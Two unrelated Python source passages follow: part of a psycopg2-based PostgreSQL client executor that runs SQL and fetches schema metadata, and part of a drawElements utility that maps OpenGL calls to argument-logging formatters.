            host = self._select_one(cursor, 'select inet_server_addr()')
            port = self._select_one(cursor, 'select inet_server_port()')
        else:
            conn = psycopg2.connect(
                database=unicode2utf8(db),
                user=unicode2utf8(user),
                password=unicode2utf8(password),
                host=unicode2utf8(host),
                port=unicode2utf8(port))

        conn.set_client_encoding('utf8')
        # Swap in the new connection only after it was opened successfully.
        if hasattr(self, 'conn'):
            self.conn.close()

        self.conn = conn
        self.conn.autocommit = True
        self.dbname = db
        self.user = user
        self.password = password
        self.host = host
        self.port = port

        register_json_typecasters(self.conn, self._json_typecaster)
        register_hstore_typecaster(self.conn)

    def _select_one(self, cur, sql):
        """
        Helper method to run a select and retrieve a single field value
        :param cur: cursor
        :param sql: string
        :return: string
        """
        cur.execute(sql)
        return cur.fetchone()

    def _json_typecaster(self, json_data):
        """Interpret incoming JSON data as a string.

        The raw data is decoded using the connection's encoding, which defaults
        to the database's encoding.

        See http://initd.org/psycopg/docs/connection.html#connection.encoding
        """
        if PY2:
            return json_data.decode(self.conn.encoding)
        else:
            return json_data

    def run(self, statement, pgspecial=None, on_error=ON_ERROR_RESUME):
        """Execute the sql in the database and return the results.

        :param statement: A string containing one or more sql statements
        :param pgspecial: PGSpecial object
        :return: List of tuples containing (title, rows, headers, status)
        """
        # Remove spaces and EOL
        statement = statement.strip()
        if not statement:  # Empty string
            yield (None, None, None, None)

        # Split the sql into separate queries and run each one.
        for sql in sqlparse.split(statement):
            # Remove spaces, eol and semi-colons.
            sql = sql.rstrip(';')

            try:
                if pgspecial:
                    # First try to run each query as special
                    _logger.debug('Trying a pgspecial command. sql: %r', sql)
                    cur = self.conn.cursor()
                    try:
                        for result in pgspecial.execute(cur, sql):
                            yield result
                        # Handled as a special command; skip normal execution
                        # for this statement.
                        continue
                    except special.CommandNotFound:
                        pass

                # Not a special command, so execute as normal sql
                yield self.execute_normal_sql(sql)
            except psycopg2.DatabaseError as e:
                _logger.error("sql: %r, error: %r", sql, e)
                _logger.error("traceback: %r", traceback.format_exc())

                if (isinstance(e, psycopg2.OperationalError)
                        or on_error == ON_ERROR_RAISE):
                    # Always raise operational errors, regardless of on_error
                    # specification
                    raise

                # Surface the error to the caller as a red status message.
                result = click.style(utf8tounicode(str(e)), fg='red')
                yield None, None, None, result

                if on_error == ON_ERROR_STOP:
                    break

    def execute_normal_sql(self, split_sql):
        """Run a single plain SQL statement and return (title, cur, headers, status)."""
        _logger.debug('Regular sql statement. sql: %r', split_sql)
        cur = self.conn.cursor()
        cur.execute(split_sql)

        # Use the most recent server notice (if any) as the result title.
        try:
            title = self.conn.notices.pop()
        except IndexError:
            title = None

        # cur.description will be None for operations that do not return
        # rows.
        if cur.description:
            headers = [x[0] for x in cur.description]
            return title, cur, headers, cur.statusmessage
        else:
            _logger.debug('No rows in result.')
            return title, None, None, cur.statusmessage

    def search_path(self):
        """Returns the current search path as a list of schema names"""
        with self.conn.cursor() as cur:
            _logger.debug('Search path query. sql: %r', self.search_path_query)
            cur.execute(self.search_path_query)
            return [x[0] for x in cur.fetchall()]

    def schemata(self):
        """Returns a list of schema names in the database"""
        with self.conn.cursor() as cur:
            _logger.debug('Schemata Query. sql: %r', self.schemata_query)
            cur.execute(self.schemata_query)
            return [x[0] for x in cur.fetchall()]

    def _relations(self, kinds=('r', 'v', 'm')):
        """Get table or view name metadata

        :param kinds: list of postgres relkind filters:
                'r' - table
                'v' - view
                'm' - materialized view
        :return: (schema_name, rel_name) tuples
        """
        with self.conn.cursor() as cur:
            sql = cur.mogrify(self.tables_query, [kinds])
            _logger.debug('Tables Query. sql: %r', sql)
            cur.execute(sql)
            for row in cur:
                yield row

    def tables(self):
        """Yields (schema_name, table_name) tuples"""
        for row in self._relations(kinds=['r']):
            yield row

    def views(self):
        """Yields (schema_name, view_name) tuples.

        Includes both views and and materialized views
        """
        for row in self._relations(kinds=['v', 'm']):
            yield row

    def _columns(self, kinds=('r', 'v', 'm')):
        """Get column metadata for tables and views

        :param kinds: kinds: list of postgres relkind filters:
                'r' - table
                'v' - view
                'm' - materialized view
        :return: list of (schema_name, relation_name, column_name) tuples
        """
        with self.conn.cursor() as cur:
            sql = cur.mogrify(self.columns_query, [kinds])
            _logger.debug('Columns Query. sql: %r', sql)
            cur.execute(sql)
            for row in cur:
                yield row

    def table_columns(self):
        """Yields (schema_name, table_name, column_name) tuples for tables."""
        for row in self._columns(kinds=['r']):
            yield row

    def view_columns(self):
        """Yields (schema_name, view_name, column_name) tuples for (mat.) views."""
        for row in self._columns(kinds=['v', 'm']):
            yield row

    def databases(self):
        """Returns a list of database names on the server."""
        with self.conn.cursor() as cur:
            _logger.debug('Databases Query. sql: %r', self.databases_query)
            cur.execute(self.databases_query)
            return [x[0] for x in cur.fetchall()]

    def functions(self):
        """Yields FunctionMetadata named tuples"""
        with self.conn.cursor() as cur:
            _logger.debug('Functions Query. sql: %r', self.functions_query)
            cur.execute(self.functions_query)
            for row in cur:
                yield FunctionMetadata(*row)

    def datatypes(self):
        """Yields tuples of (schema_name, type_name)"""
        with self.conn.cursor() as cur:
            _logger.debug('Datatypes Query. sql: %r', self.datatypes_query)
            cur.execute(self.datatypes_query)
            for row in cur:
                yield row
| |
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
from src_util import *
import re
class LogSpec:
    """Describes how arguments and return value of one GL call are logged.

    argInPrints  -- dict mapping input-argument index to a formatter callable
    argOutPrints -- dict mapping output-argument index to a formatter callable
    returnPrint  -- optional formatter callable for the return value
    """
    def __init__ (self, argInPrints, argOutPrints = None, returnPrint = None):
        self.argInPrints = argInPrints
        # Use None as the default instead of a mutable {} so that all
        # instances don't silently share one dict object.
        self.argOutPrints = {} if argOutPrints is None else argOutPrints
        self.returnPrint = returnPrint
def enum (group):
    """Return a formatter that prints an argument via get<group>Str()."""
    def formatArg (name):
        return "get%sStr(%s)" % (group, name)
    return formatArg
def pointer (size):
    """Return a formatter that prints a pointer argument of 'size' elements."""
    return lambda name: "getPointerStr({0}, {1})".format(name, size)
def enumPointer (group, size):
    """Return a formatter that prints an array of <group> enums of 'size' elements."""
    def formatArg (name):
        return "getEnumPointerStr({0}, {1}, get{2}Name)".format(name, size, group)
    return formatArg
def booleanPointer (size):
    """Return a formatter that prints an array of GLbooleans of 'size' elements."""
    def formatArg (name):
        return "getBooleanPointerStr({0}, {1})".format(name, size)
    return formatArg
def textureUnit (name):
    """Format a texture unit argument (e.g. GL_TEXTURE0) for logging."""
    return "getTextureUnitStr({0})".format(name)
def voidPointer (name):
    """Format an opaque pointer as hex; the void* cast prevents the generated
    wrapper from treating a char-typed pointer as a C string."""
    return "toHex(reinterpret_cast<deUintptr>(static_cast<const void*>({0})))".format(name)
def fnPointer (name):
    """Format a function pointer argument as a hex value."""
    return "toHex(reinterpret_cast<deUintptr>({0}))".format(name)
def stringVal (name):
    """Format a string (char*) argument via getStringStr()."""
    return "getStringStr(%s)" % name
# Special rules for printing call arguments
CALL_LOG_SPECS = {
"glActiveTexture": LogSpec({0: textureUnit}),
"glBeginQuery": LogSpec({0: enum("QueryTarget")}),
"glBeginTransformFeedback": LogSpec({0: enum("PrimitiveType")}),
"glBindBuffer": LogSpec({0: enum("BufferTarget")}),
"glBindBufferBase": LogSpec({0: enum("BufferTarget")}),
"glBindBufferRange": LogSpec({0: enum("BufferTarget")}),
"glBindFramebuffer": LogSpec({0: enum("FramebufferTarget")}),
"glBindRenderbuffer": LogSpec({0: enum("FramebufferTarget")}),
"glBindTexture": LogSpec({0: enum("TextureTarget")}),
"glBindTransformFeedback": LogSpec({0: enum("TransformFeedbackTarget")}),
"glBlendEquation": LogSpec({0: enum("BlendEquation")}),
"glBlendEquationSeparate": LogSpec({0: enum("BlendEquation"), 1: enum("BlendEquation")}),
"glBlendEquationi": LogSpec({1: enum("BlendEquation")}),
"glBlendEquationSeparatei": LogSpec({1: enum("BlendEquation"), 2: enum("BlendEquation")}),
"glBlendFunc": LogSpec({0: enum("BlendFactor"), 1: enum("BlendFactor")}),
"glBlendFuncSeparate": LogSpec({0: enum("BlendFactor"), 1: enum("BlendFactor"), 2: enum("BlendFactor"), 3: enum("BlendFactor")}),
"glBlitFramebuffer": LogSpec({8: enum("BufferMask"), 9: enum("TextureFilter")}),
"glBufferData": LogSpec({0: enum("BufferTarget"), 3: enum("Usage")}),
"glBufferSubData": LogSpec({0: enum("BufferTarget")}),
"glCheckFramebufferStatus": LogSpec({0: enum("FramebufferTarget")}, returnPrint = enum("FramebufferStatus")),
"glClear": LogSpec({0: enum("BufferMask")}),
"glClearBufferfv": LogSpec({0: enum("Buffer")}),
"glClearBufferfi": LogSpec({0: enum("Buffer")}),
"glClearBufferiv": LogSpec({0: enum("Buffer")}),
"glClearBufferuiv": LogSpec({0: enum("Buffer")}),
"glCompressedTexImage2D": LogSpec({0: enum("TextureTarget"), 2: enum("CompressedTextureFormat")}),
"glCompressedTexSubImage2D": LogSpec({0: enum("TextureTarget"), 6: enum("CompressedTextureFormat")}),
"glCompressedTexImage3D": LogSpec({0: enum("TextureTarget"), 2: enum("CompressedTextureFormat")}),
"glCompressedTexSubImage3D": LogSpec({0: enum("TextureTarget"), 8: enum("CompressedTextureFormat")}),
"glCopyTexImage1D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat")}),
"glCopyTexImage2D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat")}),
"glCreateShader": LogSpec({0: enum("ShaderType")}),
"glCullFace": LogSpec({0: enum("Face")}),
"glDeleteBuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteFramebuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteQueries": LogSpec({1: pointer(size = "n")}),
"glDeleteRenderbuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteBuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteTextures": LogSpec({1: pointer(size = "n")}),
"glDeleteVertexArrays": LogSpec({1: pointer(size = "n")}),
"glDeleteProgramPipelines": LogSpec({1: pointer(size = "n")}),
"glDepthFunc": LogSpec({0: enum("CompareFunc")}),
"glDisable": LogSpec({0: enum("EnableCap")}),
"glDisablei": LogSpec({0: enum("IndexedEnableCap")}),
"glDrawArrays": LogSpec({0: enum("PrimitiveType")}),
"glDrawArraysInstanced": LogSpec({0: enum("PrimitiveType")}),
"glDrawBuffers": LogSpec({1: enumPointer("DrawReadBuffer", size = "n")}),
"glDrawElements": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawElementsInstanced": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawRangeElements": LogSpec({0: enum("PrimitiveType"), 4: enum("Type")}),
"glDrawArraysIndirect": LogSpec({0: enum("PrimitiveType")}),
"glDrawElementsIndirect": LogSpec({0: enum("PrimitiveType"), 1: enum("Type")}),
"glDrawElementsBaseVertex": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawElementsInstancedBaseVertex": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawRangeElementsBaseVertex": LogSpec({0: enum("PrimitiveType"), 4: enum("Type")}),
"glMultiDrawArrays": LogSpec({0: enum("PrimitiveType")}),
"glMultiDrawElements": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glMultiDrawElementsBaseVertex": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glEnable": LogSpec({0: enum("EnableCap")}),
"glEnablei": LogSpec({0: enum("IndexedEnableCap")}),
"glEndQuery": LogSpec({0: enum("QueryTarget")}),
"glFramebufferRenderbuffer": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment"), 2: enum("FramebufferTarget")}),
"glFramebufferTexture2D": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment"), 2: enum("TextureTarget")}),
"glFramebufferTextureLayer": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment")}),
"glFramebufferTexture": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment")}),
"glFramebufferParameteri": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferParameter")}),
"glFrontFace": LogSpec({0: enum("Winding")}),
"glGenBuffers": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenerateMipmap": LogSpec({0: enum("TextureTarget")}),
"glGenFramebuffers": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenQueries": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenRenderbuffers": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenTextures": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenTransformFeedbacks": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenVertexArrays": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenProgramPipelines": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
# "glGetActiveAttrib":
"glGetActiveUniform": LogSpec({}, argOutPrints = {3: pointer(size = "1"), 4: pointer(size = "1"), 5: enumPointer("ShaderVarType", size = "1"), 6: stringVal}),
"glGetActiveUniformsiv": LogSpec({2: pointer(size = "uniformCount"), 3: enum("UniformParam")}, argOutPrints = {4: pointer(size = "uniformCount")}),
# "glGetAttachedShaders":
"glGetBooleanv":
LogSpec(
{
0: enum("GettableState"),
1: voidPointer # second argument has type of GLboolean* (aka. char*). Prevent
# wrapper from attempting to print the argument as a C string.
},
argOutPrints = {1: booleanPointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetBufferParameteriv": LogSpec({0: enum("BufferTarget"), 1: enum("BufferQuery")}),
"glGetBufferParameteri64v": LogSpec({0: enum("BufferTarget"), 1: enum("BufferQuery")}),
"glGetError": LogSpec({}, returnPrint = enum("Error")),
"glGetFloatv": LogSpec({0: enum("GettableState")}, argOutPrints = {1: pointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetFramebufferAttachmentParameteriv":
LogSpec(
{
0: enum("FramebufferTarget"),
1: enum("FramebufferAttachment"),
2: enum("FramebufferAttachmentParameter")
},
argOutPrints = {3: lambda name: "getFramebufferAttachmentParameterValueStr(pname, %s)" % name}),
"glGetFramebufferParameteriv": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferParameter")}, argOutPrints = {2: pointer(size = "1")}),
"glGetIntegerv": LogSpec({0: enum("GettableState")}, argOutPrints = {1: pointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetInteger64v": LogSpec({0: enum("GettableState")}, argOutPrints = {1: pointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetIntegeri_v": LogSpec({0: enum("GettableIndexedState")}, argOutPrints = {2:pointer(size = "getIndexedQueryNumArgsOut(target)")}),
"glGetInteger64i_v": LogSpec({0: enum("GettableIndexedState")}, argOutPrints = {2: pointer(size = "getIndexedQueryNumArgsOut(target)")}),
"glGetBooleani_v":
LogSpec(
{
0: enum("GettableIndexedState"),
2: voidPointer # last argument has type of GLboolean* (aka. char*). Prevent
# wrapper from attempting to print the argument as a C string.
},
argOutPrints = {2: booleanPointer(size = "getIndexedQueryNumArgsOut(target)")}),
"glGetInternalformativ": LogSpec({0: enum("InternalFormatTarget"), 1: enum("UncompressedTextureFormat"), 2: enum("InternalFormatParameter")}, argOutPrints = {4: pointer(size = "bufSize")}),
"glGetMultisamplefv": LogSpec({0: enum("MultisampleParameter")}, argOutPrints = {2: pointer(size = "2")}),
"glGetPointerv": LogSpec({0: enum("PointerState")}, argOutPrints = {1: pointer(size = "1")}),
"glGetProgramiv": LogSpec({1: enum("ProgramParam")}, argOutPrints = {2: pointer(size = "getProgramQueryNumArgsOut(pname)")}),
"glGetProgramInfoLog": LogSpec({3: voidPointer}, argOutPrints = {2: pointer(size = "1")}),
"glGetProgramPipelineiv": LogSpec({1: enum("PipelineParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetProgramPipelineInfoLog": LogSpec({3: voidPointer}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryiv": LogSpec({0: enum("QueryTarget"), 1: enum("QueryParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjectiv": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjectuiv": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjecti64v": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjectui64v": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetRenderbufferParameteriv": LogSpec({0: enum("FramebufferTarget"), 1: enum("RenderbufferParameter")}),
"glGetSamplerParameterfv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetSamplerParameteriv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetSamplerParameterIiv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetSamplerParameterIuiv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetShaderiv": LogSpec({1: enum("ShaderParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetShaderInfoLog": LogSpec({3: voidPointer}, argOutPrints = {2: pointer(size = "1")}),
"glGetShaderPrecisionFormat": LogSpec({0: enum("ShaderType"), 1: enum("PrecisionFormatType")}),
# "glGetShaderSource":
"glGetString": LogSpec({0: enum("GettableString")}, returnPrint=stringVal),
"glGetStringi": LogSpec({0: enum("GettableString")}, returnPrint=stringVal),
"glGetTexParameterfv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetTexParameteriv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetTexParameterIiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetTexParameterIuiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetTexLevelParameterfv": LogSpec({0: enum("TextureTarget"), 2: enum("TextureLevelParameter")}, argOutPrints = {3: pointer(size = "1")}),
"glGetTexLevelParameteriv": LogSpec({0: enum("TextureTarget"), 2: enum("TextureLevelParameter")}, argOutPrints = {3: pointer(size = "1")}),
# "glGetUniformfv":
# "glGetUniformiv":
"glGetUniformIndices": LogSpec({2: pointer(size = "uniformCount")}, argOutPrints = {3: pointer(size = "uniformCount")}),
"glGetVertexAttribfv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
"glGetVertexAttribiv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
"glGetVertexAttribIiv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
"glGetVertexAttribIuiv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
# "glGetVertexAttribPointerv":
"glHint": LogSpec({0: enum("Hint"), 1: enum("HintMode")}),
"glIsEnabled": LogSpec({0: enum("EnableCap")}),
"glIsEnabledi": LogSpec({0: enum("IndexedEnableCap")}),
"glPixelStorei": LogSpec({0: enum("PixelStoreParameter")}),
"glReadBuffer": LogSpec({0: enum("DrawReadBuffer")}),
"glReadPixels": LogSpec({4: enum("UncompressedTextureFormat"), 5: enum("Type")}),
"glRenderbufferStorage": LogSpec({0: enum("FramebufferTarget"), 1: enum("UncompressedTextureFormat")}),
"glRenderbufferStorageMultisample": LogSpec({0: enum("FramebufferTarget"), 2: enum("UncompressedTextureFormat")}),
"glStencilFunc": LogSpec({0: enum("CompareFunc")}),
"glStencilFuncSeparate": LogSpec({0: enum("Face"), 1: enum("CompareFunc")}),
"glStencilMaskSeparate": LogSpec({0: enum("Face")}),
"glStencilOp": LogSpec({0: enum("StencilOp"), 1: enum("StencilOp"), 2: enum("StencilOp")}),
"glStencilOpSeparate": LogSpec({0: enum("Face"), 1: enum("StencilOp"), 2: enum("StencilOp"), 3: enum("StencilOp")}),
"glTexImage1D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 5: enum("UncompressedTextureFormat"), 6: enum("Type")}),
"glTexImage2D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 6: enum("UncompressedTextureFormat"), 7: enum("Type")}),
"glTexImage2DMultisample": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 5: enum("Boolean")}),
"glTexImage3D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 7: enum("UncompressedTextureFormat"), 8: enum("Type")}),
"glTexStorage2D": LogSpec({0: enum("TextureTarget"), 2: enum("TextureFormat")}),
"glTexStorage3D": LogSpec({0: enum("TextureTarget"), 2: enum("TextureFormat")}),
"glTexStorage2DMultisample": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 5: enum("Boolean")}),
"glTexStorage3DMultisample": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 6: enum("Boolean")}),
# \todo [2012-03-08 pyry] Pointer values..
"glTexParameterf": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}),
"glTexParameteri": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: lambda name: "getTextureParameterValueStr(pname, %s)" % name}),
"glTexParameterfv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexParameteriv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexParameterIiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexParameterIuiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameterf": LogSpec({1: enum("TextureParameter")}),
"glSamplerParameteri": LogSpec({1: enum("TextureParameter"), 2: lambda name: "getTextureParameterValueStr(pname, %s)" % name}),
"glSamplerParameterfv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameteriv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameterIiv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameterIuiv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexSubImage1D": LogSpec({0: enum("TextureTarget"), 4: enum("UncompressedTextureFormat"), 5: enum("Type")}),
"glTexSubImage2D": LogSpec({0: enum("TextureTarget"), 6: enum("UncompressedTextureFormat"), 7: enum("Type")}),
"glTexSubImage3D": LogSpec({0: enum("TextureTarget"), 8: enum("UncompressedTextureFormat"), 9: enum("Type")}),
"glUniform1fv": LogSpec({2: pointer(size = "(count * 1)")}),
"glUniform1iv": LogSpec({2: pointer(size = "(count * 1)")}),
"glUniform1uiv": LogSpec({2: pointer(size = "(count * 1)")}),
"glUniform2fv": LogSpec({2: pointer(size = "(count * 2)")}),
"glUniform2iv": LogSpec({2: pointer(size = "(count * 2)")}),
"glUniform2uiv": LogSpec({2: pointer(size = "(count * 2)")}),
"glUniform3fv": LogSpec({2: pointer(size = "(count * 3)")}),
"glUniform3iv": LogSpec({2: pointer(size = "(count * 3)")}),
"glUniform3uiv": LogSpec({2: pointer(size = "(count * 3)")}),
"glUniform4fv": LogSpec({2: pointer(size = "(count * 4)")}),
"glUniform4iv": LogSpec({2: pointer(size = "(count * 4)")}),
"glUniform4uiv": LogSpec({2: pointer(size = "(count * 4)")}),
"glUniformMatrix2fv": LogSpec({3: pointer(size = "(count * 2*2)")}),
"glUniformMatrix3fv": LogSpec({3: pointer(size = "(count * 3*3)")}),
"glUniformMatrix4fv": LogSpec({3: pointer(size = "(count * 4*4)")}),
"glUniformMatrix2x3fv": LogSpec({3: pointer(size = "(count * 2*3)")}),
"glUniformMatrix2x4fv": LogSpec({3: pointer(size = "(count * 2*4)")}),
"glUniformMatrix3x2fv": LogSpec({3: pointer(size = "(count * 3*2)")}),
"glUniformMatrix3x4fv": LogSpec({3: pointer(size = "(count * 3*4)")}),
"glUniformMatrix4x2fv": LogSpec({3: pointer(size = "(count * 4*2)")}),
"glUniformMatrix4x3fv": LogSpec({3: pointer(size = "(count * 4*3)")}),
"glUseProgramStages": LogSpec({1: enum("ShaderTypeMask")}),
"glPatchParameteri": LogSpec({0: enum("PatchParam")}),
"glProgramParameteri": LogSpec({1: enum("ProgramParam")}),
"glProgramUniform1fv": LogSpec({3: pointer(size = "(count * 1)")}),
"glProgramUniform1iv": LogSpec({3: pointer(size = "(count * 1)")}),
"glProgramUniform1uiv": LogSpec({3: pointer(size = "(count * 1)")}),
"glProgramUniform2fv": LogSpec({3: pointer(size = "(count * 2)")}),
"glProgramUniform2iv": LogSpec({3: pointer(size = "(count * 2)")}),
"glProgramUniform2uiv": LogSpec({3: pointer(size = "(count * 2)")}),
"glProgramUniform3fv": LogSpec({3: pointer(size = "(count * 3)")}),
"glProgramUniform3iv": LogSpec({3: pointer(size = "(count * 3)")}),
"glProgramUniform3uiv": LogSpec({3: pointer(size = "(count * 3)")}),
"glProgramUniform4fv": LogSpec({3: pointer(size = "(count * 4)")}),
"glProgramUniform4iv": LogSpec({3: pointer(size = "(count * 4)")}),
"glProgramUniform4uiv": LogSpec({3: pointer(size = "(count * 4)")}),
"glProgramUniformMatrix2fv": LogSpec({4: pointer(size = "(count * 2*2)")}),
"glProgramUniformMatrix3fv": LogSpec({4: pointer(size = "(count * 3*3)")}),
"glProgramUniformMatrix4fv": LogSpec({4: pointer(size = "(count * 4*4)")}),
"glProgramUniformMatrix2x3fv": LogSpec({4: pointer(size = "(count * 2*3)")}),
"glProgramUniformMatrix2x4fv": LogSpec({4: pointer(size = "(count * 2*4)")}),
"glProgramUniformMatrix3x2fv": LogSpec({4: pointer(size = "(count * 3*2)")}),
"glProgramUniformMatrix3x4fv": LogSpec({4: pointer(size = "(count * 3*4)")}),
"glProgramUniformMatrix4x3fv": LogSpec({4: pointer(size = "(count * 4*3)")}),
"glProgramUniformMatrix4x2fv": LogSpec({4: pointer(size = "(count * 4*2)")}),
"glProvokingVertex": LogSpec({0: enum("ProvokingVertex")}),
"glVertexAttrib1fv": LogSpec({1: pointer(size = "1")}),
"glVertexAttrib2fv": LogSpec({1: pointer(size = "2")}),
"glVertexAttrib3fv": LogSpec({1: pointer(size = "3")}),
"glVertexAttrib4fv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib1sv": LogSpec({1: pointer(size = "1")}),
"glVertexAttrib2sv": LogSpec({1: pointer(size = "2")}),
"glVertexAttrib3sv": LogSpec({1: pointer(size = "3")}),
"glVertexAttrib4sv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib1dv": LogSpec({1: pointer(size = "1")}),
"glVertexAttrib2dv": LogSpec({1: pointer(size = "2")}),
"glVertexAttrib3dv": LogSpec({1: pointer(size = "3")}),
"glVertexAttrib4dv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4bv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4iv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4ubv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4usv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4uiv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nbv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nsv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Niv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nubv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nusv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nuiv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI1iv": LogSpec({1: pointer(size = "1")}),
"glVertexAttribI2iv": LogSpec({1: pointer(size = "2")}),
"glVertexAttribI3iv": LogSpec({1: pointer(size = "3")}),
"glVertexAttribI4iv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI1uiv": LogSpec({1: pointer(size = "1")}),
"glVertexAttribI2uiv": LogSpec({1: pointer(size = "2")}),
"glVertexAttribI3uiv": LogSpec({1: pointer(size = "3")}),
"glVertexAttribI4uiv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI4bv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI4sv": LogSpec({1: pointer(size = "4")}),
